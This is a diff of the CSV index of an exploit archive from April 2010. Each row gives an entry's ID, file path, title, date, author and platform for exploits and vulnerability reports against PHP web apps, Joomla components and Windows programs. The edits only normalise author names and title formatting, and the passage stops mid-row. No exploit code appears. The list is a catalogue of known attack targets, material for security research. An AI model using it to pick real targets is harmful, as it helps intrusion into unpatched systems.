+12002,platforms/php/webapps/12002.txt,"Musicbox 3.3 - Upload Shell Vulnerability",2010-04-01,"indoushka salah el ddine",php,webapps,0 12003,platforms/php/webapps/12003.txt,"onepound Shop / CMS XSS and SQL Injection Vulnerabilities",2010-04-01,Valentin,php,webapps,0 -12004,platforms/php/webapps/12004.txt,"PHP Jokesite V 2.0 exec Command Exploit",2010-04-01,indoushka,php,webapps,0 +12004,platforms/php/webapps/12004.txt,"PHP Jokesite V 2.0 exec Command Exploit",2010-04-01,"indoushka salah el ddine",php,webapps,0 12005,platforms/php/webapps/12005.txt,"Profi Einzelgebots Auktions System Blind SQL Injection Vulnerability",2010-04-01,"Easy Laster",php,webapps,0 -12006,platforms/php/webapps/12006.txt,"Simple Calculator by Peter Rekdal Sunde Remote Upload Vulnerability",2010-04-01,indoushka,php,webapps,0 +12006,platforms/php/webapps/12006.txt,"Simple Calculator by Peter Rekdal Sunde Remote Upload Vulnerability",2010-04-01,"indoushka salah el ddine",php,webapps,0 12007,platforms/php/webapps/12007.txt,"SimpNews 2.16.2 and Below Multiple SQL Injection Vulnerabilities",2010-04-01,NoGe,php,webapps,0 12008,platforms/windows/local/12008.pl,"TugZip 3.5 Zip File Buffer Overflow",2010-04-01,Lincoln,windows,local,0 12009,platforms/php/webapps/12009.html,"CMS Made Simple 1.7 CSRF Vulnerability",2010-04-02,"pratul agrawal",php,webapps,0 @@ -10964,11 +10964,11 @@ id,file,description,date,author,platform,type,port 12015,platforms/php/webapps/12015.txt,"Joomla Component com_menu SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0 12016,platforms/php/webapps/12016.txt,"Joomla Component com_ops SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0 12017,platforms/php/webapps/12017.txt,"Joomla Component com_football SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0 -12018,platforms/php/webapps/12018.txt,"DynPG CMS v4.1.0 Multiple Vulnerability (popup.php and counter.php)",2010-04-02,eidelweiss,php,webapps,0 -12019,platforms/php/webapps/12019.txt,"velhost uploader script v1.2 Local File Inclusion Vulnerability",2010-04-02,cr4wl3r,php,webapps,0 -12021,platforms/php/webapps/12021.txt,"68kb Knowledge Base v1.0.0rc3 admin CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0 -12022,platforms/php/webapps/12022.txt,"68kb Knowledge Base v1.0.0rc3 edit main settings CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0 -12024,platforms/windows/local/12024.php,"Zip Unzip v6 (.zip) 0day stack buffer overflow PoC exploit",2010-04-03,mr_me,windows,local,0 +12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)",2010-04-02,eidelweiss,php,webapps,0 +12019,platforms/php/webapps/12019.txt,"Velhost Uploader Script 1.2 - Local File Inclusion Vulnerability",2010-04-02,cr4wl3r,php,webapps,0 +12021,platforms/php/webapps/12021.txt,"68kb Knowledge Base 1.0.0rc3 - Admin CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0 +12022,platforms/php/webapps/12022.txt,"68kb Knowledge Base 1.0.0rc3 - Edit Main Settings CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0 +12024,platforms/windows/local/12024.php,"Zip Unzip 6.0 - (.zip) 0day stack buffer overflow PoC exploit",2010-04-03,mr_me,windows,local,0 12025,platforms/windows/dos/12025.php,"Dualis 20.4 (.bin) Local Daniel Of Service",2010-04-03,"Yakir Wizman",windows,dos,0 12026,platforms/php/webapps/12026.txt,"phpscripte24 Vor und Rückwärts Auktions System Blind SQL Injection Vulnerability",2010-04-03,"Easy Laster",php,webapps,0 12027,platforms/windows/dos/12027.py,"DSEmu 0.4.10 (.nds) Local Crash Exploit",2010-04-03,l3D,windows,dos,0 @@ -10982,19 +10982,19 @@ id,file,description,date,author,platform,type,port 12035,platforms/windows/local/12035.pl,"ZipScan 2.2c SEH",2010-04-03,"Lincoln and corelanc0d3r",windows,local,0 12036,platforms/hardware/webapps/12036.txt,"Edimax AR-7084GA Router CSRF + Persistent XSS Exploit",2010-04-03,l3D,hardware,webapps,0 12037,platforms/php/webapps/12037.txt,"Joomla component jp_jobs SQL Injection Vulnerability",2010-04-03,Valentin,php,webapps,0 -12038,platforms/php/webapps/12038.txt,"Advanced Management For Services Sites Bypass Create And Download SQL Backup Vulnerability",2010-04-04,indoushka,php,webapps,0 -12039,platforms/multiple/webapps/12039.txt,"QuickEStore 6.1 Backup Dump Vulnerability",2010-04-04,indoushka,multiple,webapps,0 +12038,platforms/php/webapps/12038.txt,"Advanced Management For Services Sites Bypass Create And Download SQL Backup Vulnerability",2010-04-04,"indoushka salah el ddine",php,webapps,0 +12039,platforms/multiple/webapps/12039.txt,"QuickEStore 6.1 Backup Dump Vulnerability",2010-04-04,"indoushka salah el ddine",multiple,webapps,0 12041,platforms/php/webapps/12041.txt,"Solutive CMS SQL Injection Vulnerability",2010-04-04,"Th3 RDX",php,webapps,0 -12042,platforms/php/webapps/12042.txt,"x10 mirco blogging V121 SQL Injection Vulnerability",2010-04-04,ITSecTeam,php,webapps,0 -12043,platforms/php/webapps/12043.html,"Prediction League 0.3.8 CSRF Create Admin User Exploit",2010-04-04,indoushka,php,webapps,0 -12044,platforms/windows/remote/12044.c,"Easy Ftp Server v1.7.0.2 MKD Remote Post-Authentication BoF Exploit",2010-04-04,x90c,windows,remote,0 +12042,platforms/php/webapps/12042.txt,"x10 mirco blogging 121 - SQL Injection Vulnerability",2010-04-04,ItSecTeam,php,webapps,0 +12043,platforms/php/webapps/12043.html,"Prediction League 0.3.8 CSRF Create Admin User Exploit",2010-04-04,"indoushka salah el ddine",php,webapps,0 +12044,platforms/windows/remote/12044.c,"Easy Ftp Server 1.7.0.2 - MKD Remote Post-Authentication BoF Exploit",2010-04-04,x90c,windows,remote,0 12045,platforms/php/webapps/12045.html,"MunkyScripts Simple Gallery SQL Injection Vulnerability",2010-04-04,ItSecTeam,php,webapps,0 -12047,platforms/php/webapps/12047.html,"nodesforum v1.033 Remote File Inclusion Vulnerability",2010-04-04,ItSecTeam,php,webapps,0 -12048,platforms/php/webapps/12048.html,"ttCMS v5 Remote File Inclusion Vulnerability",2010-04-04,ItSecTeam,php,webapps,0 +12047,platforms/php/webapps/12047.html,"nodesforum 1.033 - Remote File Inclusion Vulnerability",2010-04-04,ItSecTeam,php,webapps,0 +12048,platforms/php/webapps/12048.html,"ttCMS 5.0 - Remote File Inclusion Vulnerability",2010-04-04,ItSecTeam,php,webapps,0 12049,platforms/php/webapps/12049.html,"Uiga Proxy Remote File Inclusion Vulnerability",2010-04-04,ItSecTeam,php,webapps,0 12050,platforms/php/webapps/12050.txt,"MassMirror Uploader Multiple RFI Exploit",2010-04-04,cr4wl3r,php,webapps,0 12051,platforms/windows/local/12051.php,"PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit",2010-04-04,"Yakir Wizman",windows,local,0 -12052,platforms/php/webapps/12052.txt,"SAGU-PRO v1.0 Multiple Remote File Include Vulnerability",2010-04-04,mat,php,webapps,0 +12052,platforms/php/webapps/12052.txt,"SAGU-PRO 1.0 - Multiple Remote File Include Vulnerability",2010-04-04,Mat,php,webapps,0 12053,platforms/windows/local/12053.py,"ZipCentral (.zip) SEH Exploit",2010-04-04,TecR0c,windows,local,0 12054,platforms/php/webapps/12054.txt,"Joomla Component redSHOP Local File Inclusion Vulnerability♦",2010-04-04,NoGe,php,webapps,0 12055,platforms/php/webapps/12055.txt,"Joomla Component redTWITTER Local File Inclusion Vulnerability",2010-04-04,NoGe,php,webapps,0 @@ -11006,22 +11006,22 @@ id,file,description,date,author,platform,type,port 12061,platforms/php/webapps/12061.txt,"Facil-CMS (LFI/RFI) Vulnerability",2010-04-04,eidelweiss,php,webapps,0 12062,platforms/php/webapps/12062.txt,"Joomla Component com_ranking SQL Injection Vulnerability",2010-04-04,"DevilZ TM",php,webapps,0 12065,platforms/php/webapps/12065.txt,"Joomla Component JInventory Local File Inclusion",2010-04-05,"Chip D3 Bi0s",php,webapps,0 -12066,platforms/php/webapps/12066.txt,"Joomla Component com_svmap v1.1.1 LFI Vulnerability",2010-04-05,Vrs-hCk,php,webapps,0 +12066,platforms/php/webapps/12066.txt,"Joomla Component com_svmap 1.1.1 - LFI Vulnerability",2010-04-05,Vrs-hCk,php,webapps,0 12067,platforms/php/webapps/12067.txt,"Joomla Component com_shoutbox LFI Vulnerability",2010-04-05,Vrs-hCk,php,webapps,0 12068,platforms/php/webapps/12068.txt,"Joomla Component com_loginbox LFI Vulnerability",2010-04-05,Vrs-hCk,php,webapps,0 12069,platforms/php/webapps/12069.txt,"Joomla Component com_bca-rss-syndicator LFI Vulnerability",2010-04-05,Vrs-hCk,php,webapps,0 12070,platforms/php/webapps/12070.txt,"Joomla Magic Updater (com_joomlaupdater) LFI Vulnerability",2010-04-05,Vrs-hCk,php,webapps,0 12071,platforms/php/webapps/12071.txt,"jevoncms (LFI/RFI) Multiple Vulnerabilities",2010-04-05,eidelweiss,php,webapps,0 -12072,platforms/windows/dos/12072.pl,"MyVideoConverter v2.15 Local DoS",2010-04-05,anonymous,windows,dos,0 -12073,platforms/windows/dos/12073.pl,"MP3 Wav Editor v3.80 .mp3 Local DoS",2010-04-05,anonymous,windows,dos,0 -12074,platforms/windows/dos/12074.pl,"Portable AVS DVD Authoring v1.3.3.51 Local Crash PoC",2010-04-05,R3d-D3v!L,windows,dos,0 +12072,platforms/windows/dos/12072.pl,"MyVideoConverter 2.15 - Local DoS",2010-04-05,Anonymous,windows,dos,0 +12073,platforms/windows/dos/12073.pl,"MP3 Wav Editor 3.80 - .mp3 Local DoS",2010-04-05,Anonymous,windows,dos,0 +12074,platforms/windows/dos/12074.pl,"Portable AVS DVD Authoring 1.3.3.51 - Local Crash PoC",2010-04-05,R3d-D3v!L,windows,dos,0 12075,platforms/php/webapps/12075.txt,"LionWiki 3.X (index.php) Shell Upload Vulnerability",2010-04-05,ayastar,php,webapps,0 12076,platforms/php/webapps/12076.pl,"ilchClan <= 1.0.5 (cid) SQL Injection Vulnerability & Exploit",2010-04-05,"Easy Laster",php,webapps,0 12077,platforms/php/webapps/12077.txt,"Joomla Component News Portal com_news Local File Inclusion Vulnerability",2010-04-06,AntiSecurity,php,webapps,0 12078,platforms/php/webapps/12078.txt,"Joomla Freestyle FAQ Lite Component 1.3 com_fss (faqid) SQL Injection",2010-04-06,"Chip D3 Bi0s",php,webapps,0 -12079,platforms/windows/dos/12079.pl,"Microsoft Office (2010 beta) Communicator SIP denial of service Exploit",2010-04-06,indoushka,windows,dos,0 +12079,platforms/windows/dos/12079.pl,"Microsoft Office (2010 beta) Communicator SIP denial of service Exploit",2010-04-06,"indoushka salah el ddine",windows,dos,0 12080,platforms/windows/dos/12080.txt,"Foxit Reader <= 3.2.1.0401 Denial Of Service Exploit",2010-04-06,juza,windows,dos,0 -12081,platforms/windows/dos/12081.php,"Jzip v1.3 (.zip) Unicode buffer overflow 0day PoC",2010-04-06,mr_me,windows,dos,0 +12081,platforms/windows/dos/12081.php,"Jzip 1.3 (.zip) - Unicode Buffer Overflow PoC (0day)",2010-04-06,mr_me,windows,dos,0 12082,platforms/php/webapps/12082.txt,"Joomla Component Saber Cart com_sebercart Local File Inclusion Vulnerability",2010-04-06,AntiSecurity,php,webapps,0 12083,platforms/php/webapps/12083.txt,"Joomla Component J!WHMCS Integrator com_jwhmcs Local File Inclusion Vulnerability",2010-04-06,AntiSecurity,php,webapps,0 12084,platforms/php/webapps/12084.txt,"Joomla Component Juke Box com_jukebox Local File Inclusion Vulnerability",2010-04-06,AntiSecurity,php,webapps,0 @@ -11038,18 +11038,18 @@ id,file,description,date,author,platform,type,port 12095,platforms/linux/dos/12095.txt,"Virata EmWeb R6.0.1 Remote Crash Vulnerability",2010-04-06,"Jobert Abma",linux,dos,0 12096,platforms/windows/dos/12096.txt,"Juke 4.0.2 DoS Multiple Files",2010-04-06,anonymous,windows,dos,0 12097,platforms/php/webapps/12097.txt,"Joomla Component XOBBIX [prodid] SQL Injection Vulnerability",2010-04-06,AntiSecurity,php,webapps,0 -12098,platforms/php/webapps/12098.txt,"XSS Vulnerability in NextGEN Gallery Wordpress Plugin",2010-04-06,"Alejandro Rodriguez",php,webapps,0 +12098,platforms/php/webapps/12098.txt,"Wordpress Plugin NextGEN Gallery - XSS Vulnerability",2010-04-06,"Alejandro Rodriguez",php,webapps,0 12100,platforms/asp/webapps/12100.txt,"Espinas CMS SQL Injection Vulnerability",2010-04-07,"Pouya Daneshmand",asp,webapps,0 12101,platforms/php/webapps/12101.txt,"Joomla Component aWiki com_awiki Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps,0 12102,platforms/php/webapps/12102.txt,"Joomla Component VJDEO com_vjdeo 1.0 LFI Vulnerability",2010-04-07,"Angela Zhang",php,webapps,0 12103,platforms/multiple/local/12103.txt,"Local Glibc shared library (.so) <= 2.11.1 exploit",2010-04-07,Rh0,multiple,local,0 -12104,platforms/windows/dos/12104.py,"Anyzip (.zip) v1.1 0day Poc (SEH)",2010-04-07,ItSecTeam,windows,dos,0 -12105,platforms/php/webapps/12105.txt,"Free Image & File Hosting Upload Vulnerability",2010-04-07,indoushka,php,webapps,0 -12106,platforms/php/webapps/12106.txt,"Istgah for Centerhost Mullti Vulnerability",2010-04-07,indoushka,php,webapps,0 +12104,platforms/windows/dos/12104.py,"Anyzip 1.1 - (.zip) Poc (SEH) 0day",2010-04-07,ItSecTeam,windows,dos,0 +12105,platforms/php/webapps/12105.txt,"Free Image & File Hosting Upload Vulnerability",2010-04-07,"indoushka salah el ddine",php,webapps,0 +12106,platforms/php/webapps/12106.txt,"Istgah for Centerhost Mullti Vulnerability",2010-04-07,"indoushka salah el ddine",php,webapps,0 12107,platforms/php/webapps/12107.txt,"Plume CMS 1.2.4 Multiple Local File Inclusion Vulnerabilities",2010-04-07,eidelweiss,php,webapps,0 12108,platforms/php/webapps/12108.txt,"Joomla Component com_articles SQL Injection Vulnerability",2010-04-08,"Pratul Agrawal",php,webapps,0 12109,platforms/multiple/dos/12109.txt,"Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability",2010-04-08,ZSploit.com,multiple,dos,0 -12110,platforms/windows/dos/12110.pl,"CompleteFTP v3.3.0 - Remote Memory Consumption DoS",2010-04-08,"Jonathan Salwan",windows,dos,0 +12110,platforms/windows/dos/12110.pl,"CompleteFTP 3.3.0 - Remote Memory Consumption DoS",2010-04-08,"Jonathan Salwan",windows,dos,0 12111,platforms/php/webapps/12111.txt,"Joomla Component Webee Comments Local File Inclusion Vulnerability",2010-04-08,AntiSecurity,php,webapps,0 12112,platforms/php/webapps/12112.txt,"Joomla Component Realtyna Translator Local File Inclusion Vulnerability",2010-04-08,AntiSecurity,php,webapps,0 12113,platforms/php/webapps/12113.txt,"Joomla Component AWDwall-Joomla LFI & SQLi [cbuser] Vulnerability",2010-04-08,AntiSecurity,php,webapps,0 @@ -11065,7 +11065,7 @@ id,file,description,date,author,platform,type,port 12124,platforms/php/webapps/12124.txt,"joomla component huruhelpdesk SQL injection Vulnerability",2010-04-09,bumble_be,php,webapps,0 12128,platforms/php/webapps/12128.txt,"GarageSales Remote Upload Vulnerability",2010-04-09,saidinh0,php,webapps,0 12130,platforms/linux/local/12130.py,"Linux Kernel <= 2.6.34-rc3 ReiserFS xattr Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0 -12131,platforms/windows/dos/12131.py,"Tembria Server Monitor v5.6.0 Denial of Service",2010-04-09,Lincoln,windows,dos,0 +12131,platforms/windows/dos/12131.py,"Tembria Server Monitor 5.6.0 - Denial of Service",2010-04-09,Lincoln,windows,dos,0 12132,platforms/php/webapps/12132.pl,"Joomla Component com_agenda 1.0.1 (id) SQL Injection Vulnerability",2010-04-09,v3n0m,php,webapps,0 12133,platforms/multiple/webapps/12133.txt,"Asset Manager 1.0 Shell Upload Vulnerability",2010-04-09,"Shichemt Alen and NeT_Own3r",multiple,webapps,0 12134,platforms/php/webapps/12134.txt,"MMHAQ CMS sqli vulnersbility",2010-04-10,s1ayer,php,webapps,0 @@ -11073,7 +11073,7 @@ id,file,description,date,author,platform,type,port 12136,platforms/php/webapps/12136.txt,"Joomla Component com_properties[aid] SQL Injection Vulnerability",2010-04-10,c4uR,php,webapps,0 12137,platforms/php/webapps/12137.txt,"joomla component allvideos BLIND SQL injection Vulnerability",2010-04-10,bumble_be,php,webapps,0 12138,platforms/php/webapps/12138.txt,"Joomla Com_Ca SQL Injection Vulnerability",2010-04-10,DigitALL,php,webapps,0 -12139,platforms/php/webapps/12139.txt,"Kiasabz Article News CMS Magazine SQL Injection Vulnerability",2010-04-10,"indoushka ",php,webapps,0 +12139,platforms/php/webapps/12139.txt,"Kiasabz Article News CMS Magazine SQL Injection Vulnerability",2010-04-10,"indoushka salah el ddine",php,webapps,0 12140,platforms/php/webapps/12140.php,"xBtiTracker Remote SQL Injection Vulnerability",2010-04-11,InATeam,php,webapps,0 12141,platforms/php/webapps/12141.txt,"MediaInSpot CMS LFI Vulnerability",2010-04-11,"Amoo Arash",php,webapps,0 12142,platforms/php/webapps/12142.txt,"Joomla Component TweetLA! Local File Inclusion Vulnerability",2010-04-11,AntiSecurity,php,webapps,0 @@ -11089,13 +11089,13 @@ id,file,description,date,author,platform,type,port 12152,platforms/windows/remote/12152.pl,"Trellian FTP Client PASV BOF exploit",2010-04-11,zombiefx,windows,remote,0 12153,platforms/php/webapps/12153.txt,"joomla component education SQL injection Vulnerability",2010-04-11,bumble_be,php,webapps,0 12154,platforms/php/dos/12154.txt,"vBulletin ""Cyb - Advanced Forum Statistics"" DOS",2010-04-10,"Andhra Hackers",php,dos,0 -12155,platforms/php/webapps/12155.txt,"AuroraGPT V4 RCE Vulnerability",2010-04-11,"Amoo Arash",php,webapps,0 +12155,platforms/php/webapps/12155.txt,"AuroraGPT 4.0 - RCE Vulnerability",2010-04-11,"Amoo Arash",php,webapps,0 12156,platforms/windows/remote/12156.txt,"IE/Opera source code viewer Null Character Handling",2010-04-11,"Daniel Correa",windows,remote,0 12157,platforms/php/webapps/12157.txt,"OnePC mySite Management Software SQL Injection Vulnerability",2010-04-11,Valentin,php,webapps,0 -12158,platforms/php/webapps/12158.py,"Elite Gaming Ladders <= v3.5 (match) SQL injection",2010-04-11,"Easy Laster",php,webapps,0 +12158,platforms/php/webapps/12158.py,"Elite Gaming Ladders <= 3.5 - (match) SQL injection",2010-04-11,"Easy Laster",php,webapps,0 12159,platforms/php/webapps/12159.txt,"Joomla Component Multi-Venue Restaurant Menu Manager SQL Injection Vulnerability",2010-04-11,Valentin,php,webapps,0 12160,platforms/php/webapps/12160.txt,"HotNews 0.7.2 Remote File Inclusion",2010-04-11,team_elite,php,webapps,0 -12161,platforms/windows/dos/12161.pl,"Aladdin eToken PKI Client v4.5 Virtual File Handling Unspecified Memory Corruption PoC",2010-04-11,LiquidWorm,windows,dos,0 +12161,platforms/windows/dos/12161.pl,"Aladdin eToken PKI Client 4.5 - Virtual File Handling Unspecified Memory Corruption PoC",2010-04-11,LiquidWorm,windows,dos,0 12162,platforms/php/webapps/12162.txt,"Joomla component mv_restaurantmenumanager SQL injection Vulnerability",2010-04-11,Sudden_death,php,webapps,0 12163,platforms/php/webapps/12163.txt,"Worldviewer.com CMS SQL Injection Vulnerability",2010-04-12,"41.w4r10r aka AN1L",php,webapps,0 12164,platforms/php/webapps/12164.txt,"YaPig v0.94.0u Remote File Inclusion Vulnerability",2010-04-12,JIKO,php,webapps,0 @@ -11123,39 +11123,39 @@ id,file,description,date,author,platform,type,port 12186,platforms/php/webapps/12186.pl,"vBulletin DOS - all version",2010-04-12,"Jim Salim",php,webapps,0 12187,platforms/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 beta (RFI/LFI) Multiple File Include Vulnerability",2010-04-12,cr4wl3r,php,webapps,0 12188,platforms/multiple/dos/12188.txt,"VMware Remote Console e.x.p build-158248 - format string vulnerability",2010-04-12,"Alexey Sintsov",multiple,dos,0 -12189,platforms/windows/local/12189.php,"PHP 6.0 Dev str_transliterate() Buffer overflow - NX + ASLR Bypass",2010-04-13,"Matteo Memelli",windows,local,0 +12189,platforms/windows/local/12189.php,"PHP 6.0 Dev str_transliterate() Buffer overflow - NX + ASLR Bypass",2010-04-13,ryujin,windows,local,0 12190,platforms/php/webapps/12190.txt,"Joomla Component Jvehicles (aid) SQL Injection Vulnerability",2010-04-13,"Don Tukulesto",php,webapps,0 12191,platforms/php/webapps/12191.txt,"Joomla Component com_jp_jobs 1.2.0 (id) SQL Injection Vulnerability",2010-04-13,v3n0m,php,webapps,0 12192,platforms/php/webapps/12192.txt,"Blog System <= 1.5 Multiple Vulnerabilities",2010-04-13,cp77fk4r,php,webapps,0 12193,platforms/php/webapps/12193.txt,"Openurgence vaccin 1.03 (RFI/LFI) Multiple File Include Vulnerability",2010-04-13,cr4wl3r,php,webapps,0 12194,platforms/php/webapps/12194.txt,"Police Municipale Open Main Courante 1.01beta (RFI/LFI) Multiple File Include Vulnerability",2010-04-13,cr4wl3r,php,webapps,0 12195,platforms/php/webapps/12195.rb,"joelz bulletin board <= 0.9.9rc3 multiple SQL Injection & Exploit",2010-04-13,"Easy Laster",php,webapps,0 -12197,platforms/asp/webapps/12197.txt,"Mp3 MuZik Data Base Download Vulnerability",2010-04-13,indoushka,asp,webapps,0 -12198,platforms/php/webapps/12198.txt,"Games Script (Galore) Backup Dump Vulnerability",2010-04-13,indoushka,php,webapps,0 -12199,platforms/asp/webapps/12199.txt,"My School Script Data Base Download Vulnerability",2010-04-13,indoushka,asp,webapps,0 +12197,platforms/asp/webapps/12197.txt,"Mp3 MuZik Data Base Download Vulnerability",2010-04-13,"indoushka salah el ddine",asp,webapps,0 +12198,platforms/php/webapps/12198.txt,"Games Script (Galore) Backup Dump Vulnerability",2010-04-13,"indoushka salah el ddine",php,webapps,0 +12199,platforms/asp/webapps/12199.txt,"My School Script Data Base Download Vulnerability",2010-04-13,"indoushka salah el ddine",asp,webapps,0 12200,platforms/php/webapps/12200.txt,"Joomla Component QPersonel SQL Injection Vulnerability",2010-04-13,Valentin,php,webapps,0 -12201,platforms/windows/dos/12201.html,"MagnetoSoft DNS v4.0.0.9 ActiveX DNSLookupHostWithServer POC",2010-04-13,s4squatch,windows,dos,0 -12202,platforms/windows/remote/12202.html,"MagnetoSoft ICMP v4.0.0.18 ActiveX AddDestinationEntry BOF",2010-04-13,s4squatch,windows,remote,0 -12203,platforms/windows/remote/12203.html,"MagnetoSoft SNTP v4.0.0.7 ActiveX SntpGetReply BOF",2010-04-13,s4squatch,windows,remote,0 -12204,platforms/windows/dos/12204.html,"MagnetoSoft SNTP v4.0.0.7 ActiveX SntpSendRequest Crash POC",2010-04-13,s4squatch,windows,dos,0 -12205,platforms/windows/dos/12205.html,"MagnetoSoft NetworkResources v4.0.0.5 ActiveX NetSessionDel POC",2010-04-13,s4squatch,windows,dos,0 -12206,platforms/windows/dos/12206.html,"MagnetoSoft NetworkResources v4.0.0.5 ActiveX NetFileClose SEH Overwrite POC",2010-04-13,s4squatch,windows,dos,0 -12207,platforms/windows/dos/12207.html,"MagnetoSoft NetworkResources v4.0.0.5 ActiveX NetShareEnum SEH Overwrite POC",2010-04-13,s4squatch,windows,dos,0 +12201,platforms/windows/dos/12201.html,"MagnetoSoft DNS 4.0.0.9 - ActiveX DNSLookupHostWithServer POC",2010-04-13,s4squatch,windows,dos,0 +12202,platforms/windows/remote/12202.html,"MagnetoSoft ICMP 4.0.0.18 - ActiveX AddDestinationEntry BOF",2010-04-13,s4squatch,windows,remote,0 +12203,platforms/windows/remote/12203.html,"MagnetoSoft SNTP 4.0.0.7 - ActiveX SntpGetReply BOF",2010-04-13,s4squatch,windows,remote,0 +12204,platforms/windows/dos/12204.html,"MagnetoSoft SNTP 4.0.0.7 - ActiveX SntpSendRequest Crash POC",2010-04-13,s4squatch,windows,dos,0 +12205,platforms/windows/dos/12205.html,"MagnetoSoft NetworkResources 4.0.0.5 - ActiveX NetSessionDel POC",2010-04-13,s4squatch,windows,dos,0 +12206,platforms/windows/dos/12206.html,"MagnetoSoft NetworkResources 4.0.0.5 - ActiveX NetFileClose SEH Overwrite POC",2010-04-13,s4squatch,windows,dos,0 +12207,platforms/windows/dos/12207.html,"MagnetoSoft NetworkResources 4.0.0.5 - ActiveX NetShareEnum SEH Overwrite POC",2010-04-13,s4squatch,windows,dos,0 12208,platforms/windows/dos/12208.html,"MagnetoSoft NetworkResources ActiveX NetConnectionEnum SEH Overwrite POC",2010-04-13,s4squatch,windows,dos,0 12212,platforms/php/webapps/12212.txt,"Opentel Openmairie tel 1.02 Local File Include Vulnerability",2010-04-14,cr4wl3r,php,webapps,0 12213,platforms/windows/local/12213.c,"Micropoint Proactive Denfense Mp110013.sys <= 1.3.10123.0 Local Privilege Escalation Exploit",2010-04-14,MJ0011,windows,local,0 12217,platforms/multiple/dos/12217.py,"Remote Exploit Against the Aircrack-NG Tools svn r1675",2010-04-14,"Lukas Lueg",multiple,dos,0 -12218,platforms/asp/webapps/12218.txt,"School Management System Pro 6.0.0 Backup Dump Vulnerability",2010-04-14,indoushka,asp,webapps,0 -12219,platforms/php/webapps/12219.txt,"Mp3 Online Id Tag Editor RFI Vulnerability",2010-04-14,indoushka,php,webapps,0 -12220,platforms/php/webapps/12220.txt,"almnzm 2.1 <= SQL Injection Vulnerability",2010-04-14,"NeX HaCkEr",php,webapps,0 -12221,platforms/php/webapps/12221.rb,"Bild Flirt <= version 1.0 SQL Injection Vulnerability Exploit",2010-04-14,"Easy Laster",php,webapps,0 -12222,platforms/php/webapps/12222.txt,"PhpMesFilms 1.8 SQL Injection Vulnerability",2010-04-14,indoushka,php,webapps,0 -12223,platforms/php/webapps/12223.txt,"Multi-Mirror Remote Upload Vulnerability",2010-04-14,indoushka,php,webapps,0 -12224,platforms/php/webapps/12224.txt,"Mihalism Multi Host V 4.0.0 Upload Vulnerability",2010-04-14,indoushka,php,webapps,0 -12226,platforms/php/webapps/12226.txt,"Magic Uploader Mini Upload Vulnerability",2010-04-14,"indoushka ",php,webapps,0 +12218,platforms/asp/webapps/12218.txt,"School Management System Pro 6.0.0 Backup Dump Vulnerability",2010-04-14,"indoushka salah el ddine",asp,webapps,0 +12219,platforms/php/webapps/12219.txt,"Mp3 Online Id Tag Editor RFI Vulnerability",2010-04-14,"indoushka salah el ddine",php,webapps,0 +12220,platforms/php/webapps/12220.txt,"Almnzm <= 2.1 - SQL Injection Vulnerability",2010-04-14,"NeX HaCkeR",php,webapps,0 +12221,platforms/php/webapps/12221.rb,"Bild Flirt <= 1.0 - SQL Injection Vulnerability Exploit",2010-04-14,"Easy Laster",php,webapps,0 +12222,platforms/php/webapps/12222.txt,"PhpMesFilms 1.8 SQL Injection Vulnerability",2010-04-14,"indoushka salah el ddine",php,webapps,0 +12223,platforms/php/webapps/12223.txt,"Multi-Mirror Remote Upload Vulnerability",2010-04-14,"indoushka salah el ddine",php,webapps,0 +12224,platforms/php/webapps/12224.txt,"Mihalism Multi Host V 4.0.0 Upload Vulnerability",2010-04-14,"indoushka salah el ddine",php,webapps,0 +12226,platforms/php/webapps/12226.txt,"Magic Uploader Mini Upload Vulnerability",2010-04-14,"indoushka salah el ddine",php,webapps,0 12227,platforms/php/webapps/12227.txt,"YUI Images Script Shell Upload Vulnerability",2010-04-14,Mr.P3rfekT,php,webapps,0 -12228,platforms/windows/dos/12228.py,"MovieLibrary v1.4.401 Local Dos .dmv File",2010-04-14,anonymous,windows,dos,0 -12229,platforms/windows/dos/12229.py,"Book Library v1.4.162 Local Dos .bkd File",2010-04-14,anonymous,windows,dos,0 +12228,platforms/windows/dos/12228.py,"MovieLibrary 1.4.401 - Local DoS (.dmv)",2010-04-14,Anonymous,windows,dos,0 +12229,platforms/windows/dos/12229.py,"Book Library 1.4.162 - Local DoS (.bkd)",2010-04-14,Anonymous,windows,dos,0 12230,platforms/php/webapps/12230.txt,"Joomla Component wgPicasa com_wgpicasa Local File Inclusion Vulnerability",2010-04-14,AntiSecurity,php,webapps,0 12231,platforms/php/webapps/12231.txt,"Joomla Component S5 Clan Roster com_s5clanroster Local File Inclusion Vulnerability",2010-04-14,AntiSecurity,php,webapps,0 12232,platforms/php/webapps/12232.txt,"Joomla Component Photo Battle com_photobattle Local File Inclusion Vulnerability",2010-04-14,AntiSecurity,php,webapps,0 @@ -11166,17 +11166,17 @@ id,file,description,date,author,platform,type,port 12237,platforms/php/webapps/12237.txt,"Joomla Component Delicious Bookmarks com_delicious Local File Inclusion Vulnerability",2010-04-14,AntiSecurity,php,webapps,0 12238,platforms/php/webapps/12238.txt,"Joomla Component Deluxe Blog Factory com_blogfactory Local File Inclusion Vulnerability",2010-04-14,AntiSecurity,php,webapps,0 12239,platforms/php/webapps/12239.txt,"Joomla Component BeeHeard Lite com_beeheard Local File Inclusion Vulnerability",2010-04-14,AntiSecurity,php,webapps,0 -12240,platforms/windows/dos/12240.py,"Mocha LPD v1.9 Remote Buffer Overflow DoS PoC",2010-04-14,mr_me,windows,dos,0 +12240,platforms/windows/dos/12240.py,"Mocha LPD 1.9 - Remote Buffer Overflow DoS PoC",2010-04-14,mr_me,windows,dos,0 12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability",2010-04-14,eidelweiss,php,webapps,0 12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System Multiple SQL Injection Vulnerabilities",2010-04-14,wsn1983,jsp,webapps,0 -12243,platforms/windows/dos/12243.py,"RPM Select/Elite v5.0 (.xml config parsing) unicode buffer overflow 